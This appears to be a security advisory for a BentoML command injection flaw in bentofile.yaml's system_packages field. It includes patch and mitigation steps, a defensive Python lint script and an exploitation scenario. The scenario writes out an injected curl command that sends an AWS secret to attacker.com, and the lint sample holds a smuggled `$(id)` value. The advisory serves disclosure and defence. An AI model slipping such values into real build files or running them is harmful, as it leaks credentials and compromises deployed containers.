BentoML: command injection in bentofile.yaml containerize
Any team running `bentoml containerize` on untrusted or externally-sourced bentofile.yaml files is exposed to arbitrary command execution at build time — a classic supply-chain injection point in MLOps pipelines. Patch to BentoML 1.4.37 immediately and treat bentofile.yaml with the same scrutiny as Dockerfile or CI/CD scripts. If you cannot patch, block unreviewed bentofile.yaml ingestion in your build pipelines.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| bentoml | pip | <= 1.4.36 | 1.4.37 |
If you use bentoml at a version in the vulnerable range, you're affected.
Recommended Action
1. PATCH: Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents.
2. AUDIT: Review all bentofile.yaml files in your repositories for suspicious entries in `system_packages` — values containing semicolons, ampersands, pipes, backticks, or `$()` are red flags.
3. GATE: Add a pre-build lint step (grep/regex) to reject bentofile.yaml with non-alphanumeric characters in `system_packages`.
4. ISOLATE: Run `bentoml containerize` in ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts).
5. DETECT: Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.
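As an added example (not BentoML's own code), a Python pre-build lint for step 3 above: it inspects the parsed `docker.system_packages` list and rejects anything that is not a plain Debian/Ubuntu package name (optionally with an `=version` pin), failing closed on everything else. The `lint_bentofile` loader and its use of PyYAML are assumptions about how a team would read the file; the sample mapping is constructed.

```python
import re
from typing import Any

# Debian/Ubuntu package names: lowercase letters, digits, '+', '-', '.',
# at least two characters, starting with a letter or digit (Debian Policy 5.6.1).
# An optional '=version' pin is allowed with a conservative version charset.
_SAFE_PACKAGE = re.compile(r"^[a-z0-9][a-z0-9+.-]+(=[A-Za-z0-9.+~:-]+)?$")

# Shell metacharacters that turn a "package name" into a command when the
# value is interpolated into a Dockerfile RUN line. Checked separately so the
# report names the specific reason.
_SHELL_META = re.compile(r"[;&|`$<>(){}\\\"'\s]")


def lint_system_packages(bentofile: dict[str, Any]) -> list[str]:
    """Return one finding per unsafe docker.system_packages entry.

    Anything that is not a plain package name is rejected, so the check
    fails closed on unfamiliar values instead of guessing whether they
    are dangerous.
    """
    findings: list[str] = []
    docker = bentofile.get("docker") or {}
    if not isinstance(docker, dict):
        return ["docker section must be a mapping"]
    packages = docker.get("system_packages")
    if packages is None:
        return findings
    if not isinstance(packages, list):
        return [f"docker.system_packages must be a list, got {type(packages).__name__}"]
    for idx, entry in enumerate(packages):
        if not isinstance(entry, str):
            findings.append(f"system_packages[{idx}]: non-string entry {entry!r}")
        elif _SHELL_META.search(entry):
            findings.append(f"system_packages[{idx}]: shell metacharacters in {entry!r}")
        elif not _SAFE_PACKAGE.match(entry):
            findings.append(f"system_packages[{idx}]: not a valid package name {entry!r}")
    return findings


def lint_bentofile(path: str) -> list[str]:
    """Assumed loader: parse a bentofile.yaml with PyYAML's safe_load and lint it."""
    import yaml  # imported lazily so the core check has no dependency
    with open(path, encoding="utf-8") as fh:
        return lint_system_packages(yaml.safe_load(fh) or {})


if __name__ == "__main__":
    # Constructed sample mirroring a bentofile.yaml after yaml.safe_load.
    sample = {"service": "service:svc",
              "docker": {"system_packages": ["libgomp1", "git", "curl http://x/$(id)"]}}
    for finding in lint_system_packages(sample):
        print("REJECT:", finding)
```

A non-empty return value should fail the CI job before `bentoml containerize` runs.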
Technical Details
NVD Description
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages` is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue.
Exploitation Scenario
A threat actor targeting an ML engineering team submits a pull request to an open-source BentoML model repository, modifying bentofile.yaml to include a malicious system_packages entry such as `curl http://attacker.com/exfil?k=$(cat /run/secrets/aws_key)`. When a developer or CI/CD pipeline runs `bentoml containerize` to build the model's serving container — a routine step before deployment — the injected command executes during the Docker RUN layer, exfiltrating build secrets or installing a persistent backdoor into the resulting container image. The compromised image is then pushed to the container registry and deployed to production model serving infrastructure.
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
References
- github.com/advisories/GHSA-jfjg-vc52-wqvf
- github.com/bentoml/BentoML/security/advisories/GHSA-jfjg-vc52-wqvf
- nvd.nist.gov/vuln/detail/CVE-2026-33744